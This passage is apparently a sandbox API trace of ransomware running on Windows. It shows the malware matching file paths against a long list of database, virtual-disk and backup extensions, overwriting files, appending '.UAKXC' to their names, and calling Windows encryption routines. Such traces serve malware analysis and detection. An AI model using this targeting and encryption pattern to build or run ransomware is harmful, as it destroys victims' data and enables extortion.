[0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vvv") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".wdb") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".wmdb") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".wrk") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".xdb") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".xld") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".xmlff") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".abcddb") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".abs") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".abx") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accdw") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".adn") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".db2") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fm5") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".hjt") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".icg") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".icr") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".kdb") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".lut") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".maw") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mdn") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mdt") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vdi") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vhd") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmdk") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".pvm") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmem") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmsn") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmsd") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nvram") returned 0x0 [0147.586] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmx") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".raw") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".qcow2") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".subvol") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".bin") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vsv") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".avhd") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmrs") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vhdx") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".avdx") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vmcx") returned 0x0 [0147.587] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".iso") returned 0x0 [0147.587] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.587] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.589] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.589] SetEndOfFile (hFile=0x714) returned 1 [0147.589] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.589] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x80000, lpOverlapped=0x0) returned 1 [0147.629] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.629] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x80000, lpOverlapped=0x0) returned 1 [0147.631] CloseHandle (hObject=0x714) returned 1 [0147.637] GetProcessHeap () returned 0xea0000 [0147.637] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0147.637] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0147.637] lstrcatW (in: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.UAKXC") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.UAKXC" [0147.637] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.UAKXC" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.uakxc")) returned 1 [0147.679] GetProcessHeap () returned 0xea0000 [0147.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0147.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef44d8 | out: hHeap=0xea0000) returned 1 [0147.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2da8 | out: hHeap=0xea0000) returned 1 [0147.679] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0147.679] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0147.679] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0147.680] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0147.692] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0147.692] GetLastError () returned 0x0 [0147.692] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=1565) returned 1 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".4dd") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".4dl") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accdb") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accdc") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accde") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accdr") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accdt") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".accft") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".adb") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ade") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".adf") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".adp") returned 0x0 [0147.692] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".arc") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ora") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".alf") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ask") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".btr") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".bdf") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".cat") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".cdb") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ckp") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".cma") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".cpd") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dacpac") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dad") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".daschema") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".db") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".db-shm") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".db-wal") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".db3") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dbc") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dbf") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dbs") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dbt") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dbv") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dbx") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dcb") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dct") returned 0x0 [0147.693] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dcx") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ddl") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dlis") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dp1") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dqy") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dsk") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dsn") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dtsx") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".dxl") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".eco") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ecx") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".edb") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".epim") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".exb") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fcd") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fdb") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fic") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fmp") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fmp12") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fmpsl") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fol") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fp3") returned 0x0 [0147.694] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fp4") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fp5") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fp7") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".fpt") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".frm") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".gdb") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".grdb") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".gwi") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".hdb") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".his") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ib") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".idb") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".ihx") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".itdb") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".itw") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".jet") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".jtx") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".kdb") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".kexi") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".kexic") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".kexis") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".lgc") returned 0x0 [0147.695] StrStrIW (lpFirst="C:\\MSOCache\\All 